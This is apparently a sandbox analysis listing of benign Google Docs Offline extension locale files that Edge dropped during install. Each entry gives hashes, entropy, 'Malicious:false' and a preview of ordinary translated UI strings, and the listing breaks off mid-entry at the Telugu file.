                                                                                                                                                                                                                                                                                                                  SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                                  SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                                  SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                                  MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                                  SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                                  SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                                  SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                                  MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                                  SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                                  SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                                  SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                                  MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                                  SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                                  SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                                  SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                                  MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                                  SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                                  SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                                  SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                                  MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                                  SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                                  SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                                  SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                                  MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                                  SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                                  SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                                  SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                                  MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                                  SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                                  SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                                  SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                                  MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                                  SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                                  SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                                  SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                                  MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                                  SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                                  SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                                  SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                                  MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                                  SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                                  SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                                  SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                                  MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                                  SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                                  SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                                  SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                                  MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                                  SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                                  SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                                  SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
